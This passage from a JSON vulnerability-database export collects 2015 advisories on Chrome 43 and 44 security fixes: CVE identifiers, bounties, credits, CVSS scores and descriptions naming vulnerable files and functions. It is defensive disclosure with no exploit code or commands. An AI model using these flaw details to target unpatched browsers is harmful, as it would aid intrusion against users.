OUSPG\n\n[$1000][[474370](<https://code.google.com/p/chromium/issues/detail?id=474370>)] Medium CVE-2015-1260: Use-after-free in WebRTC. Credit to Khalil Zhani.\n\n[$500][[466351](<https://code.google.com/p/chromium/issues/detail?id=466351>)] Medium CVE-2015-1261: URL bar spoofing. Credit to Juho Nurminen.\n\n[$500][[476647](<https://code.google.com/p/chromium/issues/detail?id=476647>)] Medium CVE-2015-1262: Uninitialized value in Blink. Credit to miaubiz.\n\n[$500][[479162](<https://code.google.com/p/chromium/issues/detail?id=479162>)] Low CVE-2015-1263: Insecure download of spellcheck dictionary. Credit to Mike Ruddy.\n\n[$500][[481015](<https://code.google.com/p/chromium/issues/detail?id=481015>)] Low CVE-2015-1264: Cross-site scripting in bookmarks. Credit to K0r3Ph1L.\n", "cvss3": {}, "published": "2015-05-19T13:19:05", "type": "threatpost", "title": "Google Fixes Sandbox Escape in Chrome", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264"], "modified": "2015-05-19T17:19:05", "id": "THREATPOST:45D2D399F79C59D30CB09CDC7A87747D", "href": "https://threatpost.com/google-fixes-sandbox-escape-in-chrome/112899/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "chrome": [{"lastseen": "2023-12-03T15:21:12", "description": "The Chrome team is happy to announce the promotion of Chrome 43 to the stable channel for Windows, Mac and Linux. Chrome 43.0.2357.65 contains a number of fixes and improvements. A list of changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/42.0.2311.0..43.0.2357.0?pretty=fuller&n=10000>). \n\n**Security Fixes and Rewards** \n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed. \n\nThis update includes [37 security fixes](<https://code.google.com/p/chromium/issues/list?can=1&q=type%3Abug-security+label%3ARelease-0-M43&sort=id+-security_severity+-secseverity+-owner+-modified&colspec=ID+Pri+Status+Summary+Modified+OS+M+Security_severity+Security_impact+Owner+Reporter&cells=tiles>). Below, we highlight fixes that were contributed by external researchers. Please see the [Chromium security page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information. \n\n\n[$16337][[474029](<https://code.google.com/p/chromium/issues/detail?id=474029>)]** High** CVE-2015-1252: Sandbox escape in Chrome. Credit to anonymous. \n[$7500][[464552](<https://code.google.com/p/chromium/issues/detail?id=464552>)] **High** CVE-2015-1253: Cross-origin bypass in DOM. Credit to anonymous. \n[$3000][[444927](<https://code.google.com/p/chromium/issues/detail?id=444927>)] **High** CVE-2015-1254: Cross-origin bypass in Editing. Credit to Armin Razmdjou. \n[$3000][[473253](<https://code.google.com/p/chromium/issues/detail?id=473253>)] **High** CVE-2015-1255: Use-after-free in WebAudio. Credit to Khalil Zhani. \n[$2000][[478549](<https://code.google.com/p/chromium/issues/detail?id=478549>)] **High** CVE-2015-1256: Use-after-free in SVG. Credit to Atte Kettunen of OUSPG. \n[[481015](<https://code.google.com/p/chromium/issues/detail?id=481015>)] **High** CVE-2015-1251: Use-after-free in Speech. Credit to SkyLined working with HP's Zero Day Initiative \n[$1500][[468519](<https://code.google.com/p/chromium/issues/detail?id=468519>)] **Medium** CVE-2015-1257: Container-overflow in SVG. Credit to miaubiz. \n[$1000][[450939](<https://code.google.com/p/chromium/issues/detail?id=450939>)] **Medium** CVE-2015-1258: Negative-size parameter in Libvpx. Credit to cloudfuzzer \n[$1000][[468167](<https://code.google.com/p/chromium/issues/detail?id=468167>)] **Medium** CVE-2015-1259: Uninitialized value in PDFium. Credit to Atte Kettunen of OUSPG \n[$1000][[474370](<https://code.google.com/p/chromium/issues/detail?id=474370>)] **Medium** CVE-2015-1260: Use-after-free in WebRTC. Credit to Khalil Zhani. \n[$500][[466351](<https://code.google.com/p/chromium/issues/detail?id=466351>)] **Medium** CVE-2015-1261: URL bar spoofing. Credit to Juho Nurminen. \n[$500][[476647](<https://code.google.com/p/chromium/issues/detail?id=476647>)] **Medium** CVE-2015-1262: Uninitialized value in Blink. Credit to miaubiz. \n[$500][[479162](<https://code.google.com/p/chromium/issues/detail?id=479162>)] **Low** CVE-2015-1263: Insecure download of spellcheck dictionary. Credit to Mike Ruddy. \n[$500][[481015](<https://code.google.com/p/chromium/issues/detail?id=481015>)] **Low** CVE-2015-1264: Cross-site scripting in bookmarks. Credit to K0r3Ph1L. \n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. The total value of additional rewards and their recipients will updated here when all reports have gone through the reward panel. \n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes: \n\n\n * [[489518](<https://code.google.com/p/chromium/issues/detail?id=489518>)] CVE-2015-1265: Various fixes from internal audits, fuzzing and other initiatives.\n * Multiple vulnerabilities in V8 fixed at the tip of the 4.3 branch (currently 4.3.61.21).\n\nMany of the above bugs were detected using [AddressSanitizer](<http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>) or [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>). \n\nInterested in switching release channels? [Find out how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<http://crbug.com/>). \n\n\n\n\n\nAre you a project manager, with a technical background, who is passionate about Chrome and moving the web forward? We are [hiring](<https://www.google.com/about/careers/search#!t=jo&jid=72645002&>)! \n\n\n\nAnthony Laforge \nGoogle Chrome", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "chrome", "title": "Stable Channel Update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-19T00:00:00", "id": "GCSA-990503644729999677", "href": "https://chromereleases.googleblog.com/2015/05/stable-channel-update_19.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2023-12-03T17:33:21", "description": "Chromium-browser 43.0.2357.65 fixes a number of security issues: Use-after-free vulnerability in the SpeechRecognitionClient implementation in the Speech subsystem in Google Chrome before 43.0.2357.65 allows remote attackers to execute arbitrary code via a crafted document. (CVE-2015-1251) common/partial_circular_buffer.cc in Google Chrome before 43.0.2357.65 does not properly handle wraps, which allows remote attackers to bypass a sandbox protection mechanism or cause a denial of service (out-of-bounds write) via vectors that trigger a write operation with a large amount of data, related to the PartialCircularBuffer::Write and PartialCircularBuffer::DoWrite functions. (CVE-2015-1252) core/html/parser/HTMLConstructionSite.cpp in the DOM implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to bypass the Same Origin Policy via crafted JavaScript code that appends a child to a SCRIPT element, related to the insert and executeReparentTask functions. (CVE-2015-1253) core/dom/Document.cpp in Blink, as used in Google Chrome before 43.0.2357.65, enables the inheritance of the designMode attribute, which allows remote attackers to bypass the Same Origin Policy by leveraging the availability of editing. (CVE-2015-1254) Use-after-free vulnerability in content/renderer/media/webaudio_capturer_source.cc in the WebAudio implementation in Google Chrome before 43.0.2357.65 allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact by leveraging improper handling of a stop action for an audio track. (CVE-2015-1255) Use-after-free vulnerability in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document that leverages improper handling of a shadow tree for a use element. (CVE-2015-1256) platform/graphics/filters/FEColorMatrix.cpp in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, does not properly handle an insufficient number of values in an feColorMatrix filter, which allows remote attackers to cause a denial of service (container overflow) or possibly have unspecified other impact via a crafted document. (CVE-2015-1257) Google Chrome before 43.0.2357.65 relies on libvpx code that was not built with an appropriate --size-limit value, which allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data. (CVE-2015-1258) PDFium, as used in Google Chrome before 43.0.2357.65, does not properly initialize memory, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. (CVE-2015-1259) Multiple use-after-free vulnerabilities in content/renderer/media/user_media_client_impl.cc in the WebRTC implementation in Google Chrome before 43.0.2357.65 allow remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that executes upon completion of a getUserMedia request. (CVE-2015-1260) platform/fonts/shaping/HarfBuzzShaper.cpp in Blink, as used in Google Chrome before 43.0.2357.65, does not initialize a certain width field, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted Unicode text. (CVE-2015-1262) The Spellcheck API implementation in Google Chrome before 43.0.2357.65 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file. (CVE-2015-1263) Cross-site scripting (XSS) vulnerability in Google Chrome before 43.0.2357.65 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted data that is improperly handled by the Bookmarks feature. (CVE-2015-1264) Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2015-1265) Multiple vulnerabilities in V8 have been fixed at the tip of the 4.3 branch (currently 4.3.61.21). \n", "cvss3": {}, "published": "2015-05-23T21:53:02", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-23T21:53:02", "id": "MGASA-2015-0235", "href": "https://advisories.mageia.org/MGASA-2015-0235.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T17:33:21", "description": "libvpx before 1.4.0 allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data (CVE-2015-1258) \n", "cvss3": {}, "published": "2015-07-01T15:40:22", "type": "mageia", "title": "Updated libvpx package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-07-01T15:40:22", "id": "MGASA-2015-0249", "href": "https://advisories.mageia.org/MGASA-2015-0249.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-05T20:51:52", "description": "Chromium-browser 44.0.2403.107 fixes several security issues: PDFium, as used in Google Chrome before 44.0.2403.89, does not properly handle certain out-of-memory conditions, which allows remote attackers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via a crafted PDF document that triggers a large memory allocation. (CVE-2015-1271) Use-after-free vulnerability in the GPU process implementation in Google Chrome before 44.0.2403.89 allows remote attackers to cause a denial of service or possibly have unspecified other impact by leveraging the continued availability of a GPUChannelHost data structure during Blink shutdown, related to content/browser/gpu/browser_gpu_channel_host_factory.cc and content/renderer/render_thread_impl.cc. (CVE-2015-1272) Heap-based buffer overflow in j2k.c in OpenJPEG before r3002, as used in PDFium in Google Chrome before 44.0.2403.89, allows remote attackers to cause a denial of service or possibly have unspecified other impact via invalid JPEG2000 data in a PDF document. (CVE-2015-1273) Google Chrome before 44.0.2403.89 does not ensure that the auto-open list omits all dangerous file types, which makes it easier for remote attackers to execute arbitrary code by providing a crafted file and leveraging a user's previous \"Always open files of this type\" choice, related to download_commands.cc and download_prefs.cc. (CVE-2015-1274) Use-after-free vulnerability in content/browser/indexed_db/indexed_db_backing_store.cc in the IndexedDB implementation in Google Chrome before 44.0.2403.89 allows remote attackers to cause a denial of service or possibly have unspecified other impact by leveraging an abort action before a certain write operation. (CVE-2015-1276) Use-after-free vulnerability in the accessibility implementation in Google Chrome before 44.0.2403.89 allows remote attackers to cause a denial of service or possibly have unspecified other impact by leveraging lack of certain validity checks for accessibility-tree data structures. (CVE-2015-1277) content/browser/web_contents/web_contents_impl.cc in Google Chrome before 44.0.2403.89 does not ensure that a PDF document's modal dialog is closed upon navigation to an interstitial page, which allows remote attackers to spoof URLs via a crafted document, as demonstrated by the alert_dialog.pdf document. (CVE-2015-1278) Integer overflow in the CJBig2_Image::expand function in fxcodec/jbig2/JBig2_Image.cpp in PDFium, as used in Google Chrome before 44.0.2403.89, allows remote attackers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via large height and stride values. (CVE-2015-1279) SkPictureShader.cpp in Skia, as used in Google Chrome before 44.0.2403.89, allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging access to a renderer process and providing crafted serialized data. (CVE-2015-1280) core/loader/ImageLoader.cpp in Blink, as used in Google Chrome before 44.0.2403.89, does not properly determine the V8 context of a microtask, which allows remote attackers to bypass Content Security Policy (CSP) restrictions by providing an image from an unintended source. (CVE-2015-1281) Multiple use-after-free vulnerabilities in fpdfsdk/src/javascript/Document.cpp in PDFium, as used in Google Chrome before 44.0.2403.89, allow remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted PDF document, related to the (1) Document::delay and (2) Document::DoFieldDelay functions. (CVE-2015-1282) The LocalFrame::isURLAllowed function in core/frame/LocalFrame.cpp in Blink, as used in Google Chrome before 44.0.2403.89, does not properly check for a page's maximum number of frames, which allows remote attackers to cause a denial of service (invalid count value and use-after-free) or possibly have unspecified other impact via crafted JavaScript code that makes many createElement calls for IFRAME elements. (CVE-2015-1284) The XSSAuditor::canonicalize function in core/html/parser/XSSAuditor.cpp in the XSS auditor in Blink, as used in Google Chrome before 44.0.2403.89, does not properly choose a truncation point, which makes it easier for remote attackers to obtain sensitive information via an unspecified linear-time attack. (CVE-2015-1285) Cross-site scripting (XSS) vulnerability in the V8ContextNativeHandler::GetModuleSystem function in extensions/renderer/v8_context_native_handler.cc in Google Chrome before 44.0.2403.89 allows remote attackers to inject arbitrary web script or HTML by leveraging the lack of a certain V8 context restriction, aka a Blink \"Universal XSS (UXSS).\" (CVE-2015-1286) Blink, as used in Google Chrome before 44.0.2403.89, enables a quirks-mode exception that limits the cases in which a Cascading Style Sheets (CSS) document is required to have the text/css content type, which allows remote attackers to bypass the Same Origin Policy via a crafted web site, related to core/fetch/CSSStyleSheetResource.cpp. (CVE-2015-1287) The Spellcheck API implementation in Google Chrome before 44.0.2403.89 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file, a related issue to CVE-2015-1263. (CVE-2015-1288) Multiple unspecified vulnerabilities in Google Chrome before 44.0.2403.89 allow attackers to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2015-1289) \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-07-27T20:45:18", "type": "mageia", "title": "Updated chromium-browser package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263", "CVE-2015-1271", "CVE-2015-1272", "CVE-2015-1273", "CVE-2015-1274", "CVE-2015-1276", "CVE-2015-1277", "CVE-2015-1278", "CVE-2015-1279", "CVE-2015-1280", "CVE-2015-1281", "CVE-2015-1282", "CVE-2015-1284", "CVE-2015-1285", "CVE-2015-1286", "CVE-2015-1287", "CVE-2015-1288", "CVE-2015-1289"], "modified": "2015-07-27T20:45:18", "id": "MGASA-2015-0288", "href": "https://advisories.mageia.org/MGASA-2015-0288.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-12-03T19:49:55", "description": "### *Detect date*:\n05/19/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to bypass security restrictions, spoof user interface, conduct cross-scripting attack, cause denial of service or execute arbitrary code.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 43.0.2357.65\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/index.html>)\n\n### *Original advisories*:\n[Google blog](<http://feedproxy.google.com/~r/GoogleChromeReleases/~3/r7j0t-RwdaU/stable-channel-update_19.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-1258](<https://vulners.com/cve/CVE-2015-1258>)7.5Critical \n[CVE-2015-1259](<https://vulners.com/cve/CVE-2015-1259>)7.5Critical \n[CVE-2015-1265](<https://vulners.com/cve/CVE-2015-1265>)7.5Critical \n[CVE-2015-1251](<https://vulners.com/cve/CVE-2015-1251>)6.8High \n[CVE-2015-1262](<https://vulners.com/cve/CVE-2015-1262>)7.5Critical \n[CVE-2015-1264](<https://vulners.com/cve/CVE-2015-1264>)4.3Warning \n[CVE-2015-1252](<https://vulners.com/cve/CVE-2015-1252>)7.5Critical \n[CVE-2015-3910](<https://vulners.com/cve/CVE-2015-3910>)7.5Critical \n[CVE-2015-1263](<https://vulners.com/cve/CVE-2015-1263>)4.3Warning \n[CVE-2015-1260](<https://vulners.com/cve/CVE-2015-1260>)7.5Critical \n[CVE-2015-1261](<https://vulners.com/cve/CVE-2015-1261>)5.0Critical \n[CVE-2015-1255](<https://vulners.com/cve/CVE-2015-1255>)6.8High \n[CVE-2015-1257](<https://vulners.com/cve/CVE-2015-1257>)7.5Critical \n[CVE-2015-1256](<https://vulners.com/cve/CVE-2015-1256>)7.5Critical \n[CVE-2015-1254](<https://vulners.com/cve/CVE-2015-1254>)5.0Critical \n[CVE-2015-1253](<https://vulners.com/cve/CVE-2015-1253>)7.5Critical\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "kaspersky", "title": "KLA10585 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265", "CVE-2015-3910"], "modified": "2023-09-26T00:00:00", "id": "KLA10585", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10585/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:47", "description": "- CVE-2015-1251 (arbitrary code execution)\n\nUse-after-free vulnerability in the SpeechRecognitionClient\nimplementation in the Speech subsystem allows remote attackers to\nexecute arbitrary code via a crafted document.\n\n- CVE-2015-1252 (sandbox protection bypass)\n\nIt has been discovered that common/partial_circular_buffer.cc does not\nproperly handle wraps, which allows remote attackers to bypass a sandbox\nprotection mechanism or cause a denial of service (out-of-bounds write)\nvia vectors that trigger a write operation with a large amount of data,\nrelated to the PartialCircularBuffer::Write and\nPartialCircularBuffer::DoWrite functions.\n\n- CVE-2015-1253 (same origin policy bypass)\n\nIt has been discovered that core/html/parser/HTMLConstructionSite.cpp in\nthe DOM implementation in Blink allows remote attackers to bypass the\nSame Origin Policy via crafted JavaScript code that appends a child to a\nSCRIPT element, related to the insert and executeReparentTask functions.\n\n- CVE-2015-1254 (same origin policy bypass)\n\nIt has been discovered that core/dom/Document.cpp in Blink enables the\ninheritance of the designMode attribute, which allows remote attackers\nto bypass the Same Origin Policy by leveraging the availability of editing.\n\n- CVE-2015-1255 (denial of service)\n\nUse-after-free vulnerability in\ncontent/renderer/media/webaudio_capturer_source.cc in the WebAudio\nimplementation allows remote attackers to cause a denial of service\n(heap memory corruption) or possibly have unspecified other impact by\nleveraging improper handling of a stop action for an audio track.\n\n- CVE-2015-1256 (denial of service)\n\nUse-after-free vulnerability in the SVG implementation in Blink allows\nremote attackers to cause a denial of service or possibly have\nunspecified other impact via a crafted document that leverages improper\nhandling of a shadow tree for a use element.\n\n- CVE-2015-1257 (denial of service)\n\nIt has been discovered that platform/graphics/filters/FEColorMatrix.cpp\nin the SVG implementation in Blink does not properly handle an\ninsufficient number of values in an feColorMatrix filter, which allows\nremote attackers to cause a denial of service (container overflow) or\npossibly have unspecified other impact via a crafted document.\n\n- CVE-2015-1258 (denial of service)\n\nGoogle Chrome before 43.0.2357.65 relies on libvpx code that was not\nbuilt with an appropriate --size-limit value, which allows remote\nattackers to trigger a negative value for a size field, and consequently\ncause a denial of service or possibly have unspecified other impact, via\na crafted frame size in VP9 video data.\n\n- CVE-2015-1259 (denial of service)\n\nPDFium does not properly initialize memory, which allows remote\nattackers to cause a denial of service or possibly have unspecified\nother impact via unknown vectors.\n\n- CVE-2015-1260 (denial of service)\n\nMultiple use-after-free vulnerabilities in\ncontent/renderer/media/user_media_client_impl.cc in the WebRTC\nimplementation allow remote attackers to cause a denial of service or\npossibly have unspecified other impact via crafted JavaScript code that\nexecutes upon completion of a getUserMedia request.\n\n- CVE-2015-1263 (man-in-the-middle)\n\nThe Spellcheck API implementation does not use an HTTPS session for\ndownloading a Hunspell dictionary, which allows man-in-the-middle\nattackers to deliver incorrect spelling suggestions or possibly have\nunspecified other impact via a crafted file.\n\n- CVE-2015-1264 (cross side scripting)\n\nCross-site scripting (XSS) vulnerability allows user-assisted remote\nattackers to inject arbitrary web script or HTML via crafted data that\nis improperly handled by the Bookmarks feature.\n\n- CVE-2015-1265 (denial of service)\n\nMultiple unspecified vulnerabilities in Google Chrome before\n43.0.2357.65 allow attackers to cause a denial of service or possibly\nhave other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-21T00:00:00", "type": "archlinux", "title": "chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2015-05-21T00:00:00", "id": "ASA-201505-14", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-May/000335.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osv": [{"lastseen": "2022-08-10T07:06:51", "description": "\nSeveral vulnerabilities were discovered in the chromium web browser.\n\n\n* [CVE-2015-1251](https://security-tracker.debian.org/tracker/CVE-2015-1251)\nSkyLined discovered a use-after-free issue in speech \n recognition.\n* [CVE-2015-1252](https://security-tracker.debian.org/tracker/CVE-2015-1252)\nAn out-of-bounds write issue was discovered that could be used to\n escape from the sandbox.\n* [CVE-2015-1253](https://security-tracker.debian.org/tracker/CVE-2015-1253)\nA cross-origin bypass issue was discovered in the DOM parser.\n* [CVE-2015-1254](https://security-tracker.debian.org/tracker/CVE-2015-1254)\nA cross-origin bypass issue was discovered in the DOM editing \n feature.\n* [CVE-2015-1255](https://security-tracker.debian.org/tracker/CVE-2015-1255)\nKhalil Zhani discovered a use-after-free issue in WebAudio.\n* [CVE-2015-1256](https://security-tracker.debian.org/tracker/CVE-2015-1256)\nAtte Kettunen discovered a use-after-free issue in the SVG\n implementation.\n* [CVE-2015-1257](https://security-tracker.debian.org/tracker/CVE-2015-1257)\nmiaubiz discovered an overflow issue in the SVG implementation.\n* [CVE-2015-1258](https://security-tracker.debian.org/tracker/CVE-2015-1258)\ncloudfuzzer discovered an invalid size parameter used in the\n libvpx library.\n* [CVE-2015-1259](https://security-tracker.debian.org/tracker/CVE-2015-1259)\nAtte Kettunen discovered an uninitialized memory issue in the\n pdfium library.\n* [CVE-2015-1260](https://security-tracker.debian.org/tracker/CVE-2015-1260)\nKhalil Zhani discovered multiple use-after-free issues in chromium's\n interface to the WebRTC library.\n* [CVE-2015-1261](https://security-tracker.debian.org/tracker/CVE-2015-1261)\nJuho Nurminen discovered a URL bar spoofing issue.\n* [CVE-2015-1262](https://security-tracker.debian.org/tracker/CVE-2015-1262)\nmiaubiz discovered the use of an uninitialized class member in\n font handling.\n* [CVE-2015-1263](https://security-tracker.debian.org/tracker/CVE-2015-1263)\nMike Ruddy discovered that downloading the spellcheck dictionary\n was not done over HTTPS.\n* [CVE-2015-1264](https://security-tracker.debian.org/tracker/CVE-2015-1264)\nK0r3Ph1L discovered a cross-site scripting issue that could be\n triggered by bookmarking a site.\n* [CVE-2015-1265](https://security-tracker.debian.org/tracker/CVE-2015-1265)\nThe chrome 43 development team found and fixed various issues\n during internal auditing. Also multiple issues were fixed in\n the libv8 library, version 4.3.61.21.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\n\nWe recommend that you upgrade your chromium-browser packages.\n\n\n", "cvss3": {}, "published": "2015-05-22T00:00:00", "type": "osv", "title": "chromium-browser - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 